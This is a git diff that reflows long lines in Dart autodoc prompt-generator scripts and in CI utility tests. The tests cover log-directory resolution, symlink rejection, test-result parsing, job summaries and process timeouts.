'(no tests found)'; final testDir = libDir.isNotEmpty ? libDir.replaceFirst('lib/', 'test/') : ''; if (testDir.isNotEmpty && Directory(testDir).existsSync()) { - testContent = _truncate( - _runSync( - 'find $testDir -name "*_test.dart" -exec head -50 {} \\; 2>/dev/null', - ), - 10000, - ); + testContent = _truncate(_runSync('find $testDir -name "*_test.dart" -exec head -50 {} \\; 2>/dev/null'), 10000); } - final commands = _runSync( - 'grep -rn "extends Command" $sourceDir 2>/dev/null | head -20', - ); + final commands = _runSync('grep -rn "extends Command" $sourceDir 2>/dev/null | head -20'); print(''' You are writing practical code examples for the **$moduleName** module. @@ -100,11 +87,7 @@ Generate the complete EXAMPLES.md content. String _runSync(String command) { try { - final result = Process.runSync( - 'sh', - ['-c', command], - workingDirectory: Directory.current.path, - ); + final result = Process.runSync('sh', ['-c', command], workingDirectory: Directory.current.path); if (result.exitCode == 0) return (result.stdout as String).trim(); return ''; } catch (_) { diff --git a/scripts/prompts/autodoc_migration_prompt.dart b/scripts/prompts/autodoc_migration_prompt.dart index a8da0ab..e4bb316 100644 --- a/scripts/prompts/autodoc_migration_prompt.dart +++ b/scripts/prompts/autodoc_migration_prompt.dart @@ -9,9 +9,7 @@ import 'dart:io'; void main(List args) { if (args.length < 2) { - stderr.writeln( - 'Usage: autodoc_migration_prompt.dart [prev_hash]', - ); + stderr.writeln('Usage: autodoc_migration_prompt.dart [prev_hash]'); exit(1); } @@ -22,24 +20,16 @@ void main(List args) { // Get diff of Dart source files String sourceDiff; if (prevHash.isNotEmpty) { - sourceDiff = _truncate( - _runSync('git diff $prevHash..HEAD -- $sourceDir'), - 30000, - ); + sourceDiff = _truncate(_runSync('git diff $prevHash..HEAD -- $sourceDir'), 30000); } else { // No previous hash, show recent changes - sourceDiff = _truncate( - _runSync('git log --oneline -20 -- $sourceDir'), - 5000, - ); + sourceDiff = _truncate(_runSync('git log --oneline -20 -- $sourceDir'), 5000); } // Get list of changed files final changedFiles = prevHash.isNotEmpty ? _runSync('git diff --name-only $prevHash..HEAD -- $sourceDir') - : _runSync( - 'git log --oneline --name-only -10 -- $sourceDir | grep ".dart"', - ); + : _runSync('git log --oneline --name-only -10 -- $sourceDir | grep ".dart"'); // Get added/removed classes, mixins, extensions, enums final addedDefinitions = prevHash.isNotEmpty @@ -105,11 +95,7 @@ Generate the complete MIGRATION.md content. String _runSync(String command) { try { - final result = Process.runSync( - 'sh', - ['-c', command], - workingDirectory: Directory.current.path, - ); + final result = Process.runSync('sh', ['-c', command], workingDirectory: Directory.current.path); if (result.exitCode == 0) return (result.stdout as String).trim(); return ''; } catch (_) { diff --git a/scripts/prompts/autodoc_quickstart_prompt.dart b/scripts/prompts/autodoc_quickstart_prompt.dart index 84d65f8..5d9103c 100644 --- a/scripts/prompts/autodoc_quickstart_prompt.dart +++ b/scripts/prompts/autodoc_quickstart_prompt.dart @@ -9,9 +9,7 @@ import 'dart:io'; void main(List args) { if (args.length < 2) { - stderr.writeln( - 'Usage: autodoc_quickstart_prompt.dart [lib_dir]', - ); + stderr.writeln('Usage: autodoc_quickstart_prompt.dart [lib_dir]'); exit(1); } @@ -28,22 +26,16 @@ void main(List args) { final firstDart = _runSync( 'find $sourceDir -name "*.dart" -not -name "*.g.dart" -not -name "*.pb.dart" -not -name "*.pbenum.dart" -not -name "*.pbjson.dart" -not -name "*.pbgrpc.dart" -type f 2>/dev/null | head -1', ); - final dartPreview = firstDart.isNotEmpty - ? _truncate(_runSync('cat "$firstDart"'), 15000) - : '(no Dart files)'; + final dartPreview = firstDart.isNotEmpty ? _truncate(_runSync('cat "$firstDart"'), 15000) : '(no Dart files)'; final classes = _runSync( 'grep -rn "^class\\|^abstract class\\|^mixin\\|^extension" $sourceDir 2>/dev/null | head -30', ); - final exports = _runSync( - 'grep -rn "^export" $sourceDir 2>/dev/null | head -20', - ); + final exports = _runSync('grep -rn "^export" $sourceDir 2>/dev/null | head -20'); String libTree = '(same as source)'; if (libDir.isNotEmpty && libDir != sourceDir && Directory(libDir).existsSync()) { - libTree = _runSync( - 'tree $libDir -L 2 --dirsfirst -I "*.g.dart" 2>/dev/null || echo "(no tree)"', - ); + libTree = _runSync('tree $libDir -L 2 --dirsfirst -I "*.g.dart" 2>/dev/null || echo "(no tree)"'); } print(''' @@ -120,11 +112,7 @@ Generate the complete QUICKSTART.md content. String _runSync(String command) { try { - final result = Process.runSync( - 'sh', - ['-c', command], - workingDirectory: Directory.current.path, - ); + final result = Process.runSync('sh', ['-c', command], workingDirectory: Directory.current.path); if (result.exitCode == 0) return (result.stdout as String).trim(); return '(command failed)'; } catch (_) { diff --git a/test/cli_utils_test.dart b/test/cli_utils_test.dart index bab5f1c..d1fe25d 100644 --- a/test/cli_utils_test.dart +++ b/test/cli_utils_test.dart @@ -47,10 +47,7 @@ void main() { }); test('returns default path when TEST_LOG_DIR is unset', () { - final resolved = RepoUtils.resolveTestLogDir( - repoRoot, - environment: const {}, - ); + final resolved = RepoUtils.resolveTestLogDir(repoRoot, environment: const {}); expect(resolved, equals(p.join(repoRoot, '.dart_tool', 'test-logs'))); }); @@ -74,10 +71,8 @@ void main() { test('throws when TEST_LOG_DIR is relative', () { expect( - () => RepoUtils.resolveTestLogDir( - repoRoot, - environment: const {'TEST_LOG_DIR': 'relative/path'}, - ), + () => + RepoUtils.resolveTestLogDir(repoRoot, environment: const {'TEST_LOG_DIR': 'relative/path'}), throwsA(isA()), ); }); @@ -86,10 +81,7 @@ void main() { final runnerTemp = p.join(repoRoot, 'runner-temp'); final outside = p.join(repoRoot, 'outside', 'logs'); expect( - () => RepoUtils.resolveTestLogDir( - repoRoot, - environment: {'RUNNER_TEMP': runnerTemp, 'TEST_LOG_DIR': outside}, - ), + () => RepoUtils.resolveTestLogDir(repoRoot, environment: {'RUNNER_TEMP': runnerTemp, 'TEST_LOG_DIR': outside}), throwsA(isA()), ); }); @@ -109,10 +101,7 @@ void main() { expect( () => RepoUtils.resolveTestLogDir( repoRoot, - environment: { - 'RUNNER_TEMP': '/tmp/runner\nbad', - 'TEST_LOG_DIR': inside, - }, + environment: {'RUNNER_TEMP': '/tmp/runner\nbad', 'TEST_LOG_DIR': inside}, ), throwsA(isA()), ); @@ -152,35 +141,19 @@ void main() { expect(File(filePath).readAsStringSync(), equals('hello world')); }); - test( - 'ensureSafeDirectory rejects symlink-backed directories', - skip: !symlinksSupported, - () { - final targetDir = Directory(p.join(tempDir.path, 'target')) - ..createSync(recursive: true); - final linkDirPath = p.join(tempDir.path, 'linked'); - Link(linkDirPath).createSync(targetDir.path); - expect( - () => RepoUtils.ensureSafeDirectory(linkDirPath), - throwsA(isA()), - ); - }, - ); - - test( - 'writeFileSafely rejects symlink file targets', - skip: !symlinksSupported, - () { - final targetFile = File(p.join(tempDir.path, 'target.txt')) - ..writeAsStringSync('base'); - final linkPath = p.join(tempDir.path, 'linked.txt'); - Link(linkPath).createSync(targetFile.path); - expect( - () => RepoUtils.writeFileSafely(linkPath, 'new content'), - throwsA(isA()), - ); - }, - ); + test('ensureSafeDirectory rejects symlink-backed directories', skip: !symlinksSupported, () { + final targetDir = Directory(p.join(tempDir.path, 'target'))..createSync(recursive: true); + final linkDirPath = p.join(tempDir.path, 'linked'); + Link(linkDirPath).createSync(targetDir.path); + expect(() => RepoUtils.ensureSafeDirectory(linkDirPath), throwsA(isA())); + }); + + test('writeFileSafely rejects symlink file targets', skip: !symlinksSupported, () { + final targetFile = File(p.join(tempDir.path, 'target.txt'))..writeAsStringSync('base'); + final linkPath = p.join(tempDir.path, 'linked.txt'); + Link(linkPath).createSync(targetFile.path); + expect(() => RepoUtils.writeFileSafely(linkPath, 'new content'), throwsA(isA())); + }); }); group('TestResultsUtil.parseTestResultsJson', () { @@ -217,35 +190,27 @@ void main() { expect(results.failures, isEmpty); }); - test( - 'returns unparsed results when NDJSON file has only blank lines', - () async { - final jsonPath = p.join(tempDir.path, 'blank.json'); - File(jsonPath).writeAsStringSync('\n \n\t\n'); - final results = await TestResultsUtil.parseTestResultsJson(jsonPath); - expect(results.parsed, isFalse); - expect(results.passed, equals(0)); - expect(results.failed, equals(0)); - expect(results.skipped, equals(0)); - expect(results.failures, isEmpty); - }, - ); - - test( - 'returns unparsed results when file has valid JSON but no structured events', - () async { - final jsonPath = p.join(tempDir.path, 'no_events.json'); - File( - jsonPath, - ).writeAsStringSync('{"type":"unknown","data":1}\n{"other":"value"}\n'); - final results = await TestResultsUtil.parseTestResultsJson(jsonPath); - expect(results.parsed, isFalse); - expect(results.passed, equals(0)); - expect(results.failed, equals(0)); - expect(results.skipped, equals(0)); - expect(results.failures, isEmpty); - }, - ); + test('returns unparsed results when NDJSON file has only blank lines', () async { + final jsonPath = p.join(tempDir.path, 'blank.json'); + File(jsonPath).writeAsStringSync('\n \n\t\n'); + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); + expect(results.parsed, isFalse); + expect(results.passed, equals(0)); + expect(results.failed, equals(0)); + expect(results.skipped, equals(0)); + expect(results.failures, isEmpty); + }); + + test('returns unparsed results when file has valid JSON but no structured events', () async { + final jsonPath = p.join(tempDir.path, 'no_events.json'); + File(jsonPath).writeAsStringSync('{"type":"unknown","data":1}\n{"other":"value"}\n'); + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); + expect(results.parsed, isFalse); + expect(results.passed, equals(0)); + expect(results.failed, equals(0)); + expect(results.skipped, equals(0)); + expect(results.failures, isEmpty); + }); test('parses pass/fail/skipped counts and failure details', () async { final jsonPath = p.join(tempDir.path, 'results.json'); @@ -375,12 +340,7 @@ void main() { }); group('TestResultsUtil.writeTestJobSummary', () { - TestResults _parsed({ - required int passed, - required int failed, - required int skipped, - int durationMs = 500, - }) { + TestResults _parsed({required int passed, required int failed, required int skipped, int durationMs = 500}) { final results = TestResults() ..parsed = true ..passed = passed @@ -390,50 +350,39 @@ void main() { return results; } - test( - 'emits NOTE when parsed results are successful and exit code is 0', - () { - String? summary; - final results = _parsed(passed: 3, failed: 0, skipped: 1); - - TestResultsUtil.writeTestJobSummary( - results, - 0, - platformId: 'linux-x64', - writeSummary: (markdown) => summary = markdown, - ); + test('emits NOTE when parsed results are successful and exit code is 0', () { + String? summary; + final results = _parsed(passed: 3, failed: 0, skipped: 1); - expect(summary, isNotNull); - expect(summary!, contains('## Test Results — linux-x64')); - expect(summary!, contains('> [!NOTE]')); - expect(summary!, contains('All 4 tests passed')); - }, - ); - - test( - 'emits CAUTION when exit code is non-zero even if failed count is zero', - () { - String? summary; - final results = _parsed(passed: 2, failed: 0, skipped: 0); - - TestResultsUtil.writeTestJobSummary( - results, - 1, - platformId: 'linux ', - writeSummary: (markdown) => summary = markdown, - ); + TestResultsUtil.writeTestJobSummary( + results, + 0, + platformId: 'linux-x64', + writeSummary: (markdown) => summary = markdown, + ); - expect(summary, isNotNull); - expect(summary!, contains('## Test Results — linux <x64>')); - expect(summary!, contains('> [!CAUTION]')); - expect( - summary!, - contains( - 'Tests exited with code 1 despite no structured test failures.', - ), - ); - }, - ); + expect(summary, isNotNull); + expect(summary!, contains('## Test Results — linux-x64')); + expect(summary!, contains('> [!NOTE]')); + expect(summary!, contains('All 4 tests passed')); + }); + + test('emits CAUTION when exit code is non-zero even if failed count is zero', () { + String? summary; + final results = _parsed(passed: 2, failed: 0, skipped: 0); + + TestResultsUtil.writeTestJobSummary( + results, + 1, + platformId: 'linux ', + writeSummary: (markdown) => summary = markdown, + ); + + expect(summary, isNotNull); + expect(summary!, contains('## Test Results — linux <x64>')); + expect(summary!, contains('> [!CAUTION]')); + expect(summary!, contains('Tests exited with code 1 despite no structured test failures.')); + }); test('emits CAUTION for unparsed results with non-zero exit code', () { String? summary; @@ -448,12 +397,7 @@ void main() { expect(summary, isNotNull); expect(summary!, contains('> [!CAUTION]')); - expect( - summary!, - contains( - 'Tests failed (exit code 7) — no structured results available.', - ), - ); + expect(summary!, contains('Tests failed (exit code 7) — no structured results available.')); }); test('emits NOTE for unparsed results with zero exit code', () { @@ -469,25 +413,14 @@ void main() { expect(summary, isNotNull); expect(summary!, contains('> [!NOTE]')); - expect( - summary!, - contains( - 'Tests passed (exit code 0) — no structured results available.', - ), - ); + expect(summary!, contains('Tests passed (exit code 0) — no structured results available.')); }); test('emits CAUTION when parsed results contain failures', () { String? summary; final results = _parsed(passed: 1, failed: 1, skipped: 0); results.failures.add( - TestFailure( - name: 'failing test', - error: 'boom', - stackTrace: 'trace', - printOutput: '', - durationMs: 12, - ), + TestFailure(name: 'failing test', error: 'boom', stackTrace: 'trace', printOutput: '', durationMs: 12), ); TestResultsUtil.writeTestJobSummary( @@ -527,12 +460,7 @@ void main() { ); expect(summary, isNotNull); - expect( - summary!, - contains( - '_...and 5 more failures. See test logs artifact for full details._', - ), - ); + expect(summary!, contains('_...and 5 more failures. See test logs artifact for full details._')); expect(summary!, isNot(contains('failing test 24'))); }); @@ -592,10 +520,7 @@ void main() { group('Utf8BoundedBuffer', () { test('appends full content when under byte limit', () { - final buffer = Utf8BoundedBuffer( - maxBytes: 20, - truncationSuffix: '...[truncated]', - ); + final buffer = Utf8BoundedBuffer(maxBytes: 20, truncationSuffix: '...[truncated]'); buffer.append('hello'); buffer.append(' world'); expect(buffer.isTruncated, isFalse); @@ -612,18 +537,12 @@ void main() { expect(buffer.byteLength, equals(9)); }); - test( - 'never exceeds maxBytes even when suffix is longer than remaining budget', - () { - final buffer = Utf8BoundedBuffer( - maxBytes: 4, - truncationSuffix: '...[truncated]', - ); - buffer.append('abcdefgh'); - expect(buffer.isTruncated, isTrue); - expect(utf8.encode(buffer.toString()).length, lessThanOrEqualTo(4)); - }, - ); + test('never exceeds maxBytes even when suffix is longer than remaining budget', () { + final buffer = Utf8BoundedBuffer(maxBytes: 4, truncationSuffix: '...[truncated]'); + buffer.append('abcdefgh'); + expect(buffer.isTruncated, isTrue); + expect(utf8.encode(buffer.toString()).length, lessThanOrEqualTo(4)); + }); }); group('StepSummary', () { @@ -640,10 +559,7 @@ void main() { File(summaryPath).writeAsStringSync('x' * (maxBytes - 2)); expect(File(summaryPath).lengthSync(), equals(maxBytes - 2)); - StepSummary.write( - '語', - environment: {'GITHUB_STEP_SUMMARY': summaryPath}, - ); + StepSummary.write('語', environment: {'GITHUB_STEP_SUMMARY': summaryPath}); // Should skip append (would exceed); file size unchanged expect(File(summaryPath).lengthSync(), equals(maxBytes - 2)); } finally { @@ -679,9 +595,7 @@ void main() { void _writeConfig(Map ci) { final configDir = Directory('${tempDir.path}/.runtime_ci')..createSync(); - File( - '${configDir.path}/config.json', - ).writeAsStringSync(json.encode({'ci': ci})); + File('${configDir.path}/config.json').writeAsStringSync(json.encode({'ci': ci})); } test('returns empty when no sub_packages', () { @@ -771,55 +685,35 @@ void main() { }); group('CiProcessRunner.exec', () { - test( - 'fatal path exits with process exit code after flushing stdout/stderr', - () async { - final scriptPath = p.join( - p.current, - 'test', - 'scripts', - 'fatal_exit_probe.dart', - ); - final result = Process.runSync(Platform.resolvedExecutable, [ - 'run', - scriptPath, - ], runInShell: false); - final expectedCode = Platform.isWindows ? 7 : 1; - expect( - result.exitCode, - equals(expectedCode), - reason: 'fatal exec should exit with failing command exit code', - ); - }, - ); + test('fatal path exits with process exit code after flushing stdout/stderr', () async { + final scriptPath = p.join(p.current, 'test', 'scripts', 'fatal_exit_probe.dart'); + final result = Process.runSync(Platform.resolvedExecutable, ['run', scriptPath], runInShell: false); + final expectedCode = Platform.isWindows ? 7 : 1; + expect(result.exitCode, equals(expectedCode), reason: 'fatal exec should exit with failing command exit code'); + }); }); group('CiProcessRunner.runWithTimeout', () { test('completes normally when process finishes within timeout', () async { - final result = await CiProcessRunner.runWithTimeout( - Platform.resolvedExecutable, - ['--version'], - timeout: const Duration(seconds: 10), - ); + final result = await CiProcessRunner.runWithTimeout(Platform.resolvedExecutable, [ + '--version', + ], timeout: const Duration(seconds: 10)); expect(result.exitCode, equals(0)); expect(result.stdout, contains('Dart')); }); - test( - 'returns timeout result and kills process when timeout exceeded', - () async { - final executable = Platform.isWindows ? 'ping' : 'sleep'; - final args = Platform.isWindows ? ['127.0.0.1', '-n', '60'] : ['60']; - final result = await CiProcessRunner.runWithTimeout( - executable, - args, - timeout: const Duration(milliseconds: 500), - timeoutExitCode: 124, - timeoutMessage: 'Timed out', - ); - expect(result.exitCode, equals(124)); - expect(result.stderr, equals('Timed out')); - }, - ); + test('returns timeout result and kills process when timeout exceeded', () async { + final executable = Platform.isWindows ? 'ping' : 'sleep'; + final args = Platform.isWindows ? ['127.0.0.1', '-n', '60'] : ['60']; + final result = await CiProcessRunner.runWithTimeout( + executable, + args, + timeout: const Duration(milliseconds: 500), + timeoutExitCode: 124, + timeoutMessage: 'Timed out', + ); + expect(result.exitCode, equals(124)); + expect(result.stderr, equals('Timed out')); + }); }); } diff --git a/test/test_command_test.dart b/test/test_command_test.dart index eb50d93..88b4ff4 100644 --- a/test/test_command_test.dart +++ b/test/test_command_test.dart @@ -33,14 +33,13 @@ void main() { void writeRootPubspec({bool includeTest = false}) { final deps = includeTest ? 'dev_dependencies:\n test: ^1.24.0\n' : ''; - File(p.join(tempDir.path, 'pubspec.yaml')).writeAsStringSync( - 'name: ${config.repoName}\nversion: 0.0.0\nenvironment:\n sdk: ^3.0.0\n$deps', - ); + File( + p.join(tempDir.path, 'pubspec.yaml'), + ).writeAsStringSync('name: ${config.repoName}\nversion: 0.0.0\nenvironment:\n sdk: ^3.0.0\n$deps'); } void writeSubPackageConfig(List> subPackages) { - final configDir = Directory(p.join(tempDir.path, '.runtime_ci')) - ..createSync(recursive: true); + final configDir = Directory(p.join(tempDir.path, '.runtime_ci'))..createSync(recursive: true); File(p.join(configDir.path, 'config.json')).writeAsStringSync( jsonEncode({ 'ci': { @@ -52,17 +51,14 @@ void main() { ); } - test( - 'skips root tests and succeeds when no test/ directory exists', - () async { - // Minimal repo: pubspec with matching name, no test/ - writeRootPubspec(); + test('skips root tests and succeeds when no test/ directory exists', () async { + // Minimal repo: pubspec with matching name, no test/ + writeRootPubspec(); - // Completes without throwing or exit(1); StepSummary.write is no-op when - // GITHUB_STEP_SUMMARY is unset (local runs). - await TestCommand.runWithRoot(tempDir.path); - }, - ); + // Completes without throwing or exit(1); StepSummary.write is no-op when + // GITHUB_STEP_SUMMARY is unset (local runs). + await TestCommand.runWithRoot(tempDir.path); + }); test('uses passed repoRoot for log directory resolution', () async { // Create minimal repo @@ -75,86 +71,64 @@ void main() { expect(Directory(expectedLogDir).existsSync(), isTrue); }); - test( - 'runs root tests, writes results.json, and StepSummary pathway produces valid output', - () async { - // Minimal repo with a passing test to exercise full TestCommand flow - writeRootPubspec(includeTest: true); - Directory(p.join(tempDir.path, 'test')).createSync(recursive: true); - File( - p.join(tempDir.path, 'test', 'passing_test.dart'), - ).writeAsStringSync(''' + test('runs root tests, writes results.json, and StepSummary pathway produces valid output', () async { + // Minimal repo with a passing test to exercise full TestCommand flow + writeRootPubspec(includeTest: true); + Directory(p.join(tempDir.path, 'test')).createSync(recursive: true); + File(p.join(tempDir.path, 'test', 'passing_test.dart')).writeAsStringSync(''' import 'package:test/test.dart'; void main() { test('passes', () => expect(1 + 1, equals(2))); } '''); - // Resolve dependencies so dart test can run - final pubGet = await Process.run('dart', [ - 'pub', - 'get', - ], workingDirectory: tempDir.path); - expect(pubGet.exitCode, equals(0), reason: 'dart pub get must succeed'); - - await TestCommand.runWithRoot(tempDir.path); - - final logDir = p.join(tempDir.path, '.dart_tool', 'test-logs'); - expect( - Directory(logDir).existsSync(), - isTrue, - reason: 'log dir should be created', - ); + // Resolve dependencies so dart test can run + final pubGet = await Process.run('dart', ['pub', 'get'], workingDirectory: tempDir.path); + expect(pubGet.exitCode, equals(0), reason: 'dart pub get must succeed'); - // results.json or expanded.txt are written by file reporters - final jsonPath = p.join(logDir, 'results.json'); - final expandedPath = p.join(logDir, 'expanded.txt'); - final hasResults = - File(jsonPath).existsSync() || File(expandedPath).existsSync(); - expect( - hasResults, - isTrue, - reason: 'at least one reporter output should exist', - ); + await TestCommand.runWithRoot(tempDir.path); - // If results.json exists, verify parse + writeTestJobSummary pathway - if (File(jsonPath).existsSync()) { - final results = await TestResultsUtil.parseTestResultsJson(jsonPath); - expect(results.parsed, isTrue); - expect(results.passed, greaterThanOrEqualTo(1)); - expect(results.failed, equals(0)); - - String? capturedSummary; - TestResultsUtil.writeTestJobSummary( - results, - 0, - platformId: 'test-runner', - writeSummary: (m) => capturedSummary = m, - ); - expect(capturedSummary, isNotNull); - expect(capturedSummary!, contains('## Test Results — test-runner')); - expect(capturedSummary!, contains('passed')); - } - }, - ); + final logDir = p.join(tempDir.path, '.dart_tool', 'test-logs'); + expect(Directory(logDir).existsSync(), isTrue, reason: 'log dir should be created'); + + // results.json or expanded.txt are written by file reporters + final jsonPath = p.join(logDir, 'results.json'); + final expandedPath = p.join(logDir, 'expanded.txt'); + final hasResults = File(jsonPath).existsSync() || File(expandedPath).existsSync(); + expect(hasResults, isTrue, reason: 'at least one reporter output should exist'); + + // If results.json exists, verify parse + writeTestJobSummary pathway + if (File(jsonPath).existsSync()) { + final results = await TestResultsUtil.parseTestResultsJson(jsonPath); + expect(results.parsed, isTrue); + expect(results.passed, greaterThanOrEqualTo(1)); + expect(results.failed, equals(0)); + + String? capturedSummary; + TestResultsUtil.writeTestJobSummary( + results, + 0, + platformId: 'test-runner', + writeSummary: (m) => capturedSummary = m, + ); + expect(capturedSummary, isNotNull); + expect(capturedSummary!, contains('## Test Results — test-runner')); + expect(capturedSummary!, contains('passed')); + } + }); test('exits with code 1 when root tests fail', () async { writeRootPubspec(includeTest: true); Directory(p.join(tempDir.path, 'test')).createSync(recursive: true); - File(p.join(tempDir.path, 'test', 'failing_test.dart')).writeAsStringSync( - ''' + File(p.join(tempDir.path, 'test', 'failing_test.dart')).writeAsStringSync(''' import 'package:test/test.dart'; void main() { test('fails', () => expect(1, equals(2))); } -''', - ); +'''); - final pubGet = await Process.run('dart', [ - 'pub', - 'get', - ], workingDirectory: tempDir.path); + final pubGet = await Process.run('dart', ['pub', 'get'], workingDirectory: tempDir.path); expect(pubGet.exitCode, equals(0), reason: 'dart pub get must succeed'); await expectLater( @@ -163,32 +137,25 @@ void main() { ); }); - test( - 'exits when configured sub-package directory has no pubspec.yaml', - () async { - writeRootPubspec(); - writeSubPackageConfig([ - {'name': 'pkg_a', 'path': 'packages/pkg_a'}, - ]); - Directory( - p.join(tempDir.path, 'packages', 'pkg_a'), - ).createSync(recursive: true); - - await expectLater( - () => - TestCommand.runWithRoot(tempDir.path, exitHandler: _throwingExit), - throwsA(isA<_TestExit>().having((e) => e.code, 'code', 1)), - ); - }, - ); + test('exits when configured sub-package directory has no pubspec.yaml', () async { + writeRootPubspec(); + writeSubPackageConfig([ + {'name': 'pkg_a', 'path': 'packages/pkg_a'}, + ]); + Directory(p.join(tempDir.path, 'packages', 'pkg_a')).createSync(recursive: true); + + await expectLater( + () => TestCommand.runWithRoot(tempDir.path, exitHandler: _throwingExit), + throwsA(isA<_TestExit>().having((e) => e.code, 'code', 1)), + ); + }); test('exits when sub-package pub get times out', () async { writeRootPubspec(); writeSubPackageConfig([ {'name': 'pkg_timeout', 'path': 'packages/pkg_timeout'}, ]); - final pkgDir = Directory(p.join(tempDir.path, 'packages', 'pkg_timeout')) - ..createSync(recursive: true); + final pkgDir = Directory(p.join(tempDir.path, 'packages', 'pkg_timeout'))..createSync(recursive: true); File(p.join(pkgDir.path, 'pubspec.yaml')).writeAsStringSync(''' name: pkg_timeout version: 0.0.0 @@ -207,11 +174,7 @@ void main() { '''); await expectLater( - () => TestCommand.runWithRoot( - tempDir.path, - pubGetTimeout: Duration.zero, - exitHandler: _throwingExit, - ), + () => TestCommand.runWithRoot(tempDir.path, pubGetTimeout: Duration.zero, exitHandler: _throwingExit), throwsA(isA<_TestExit>().having((e) => e.code, 'code', 1)), ); });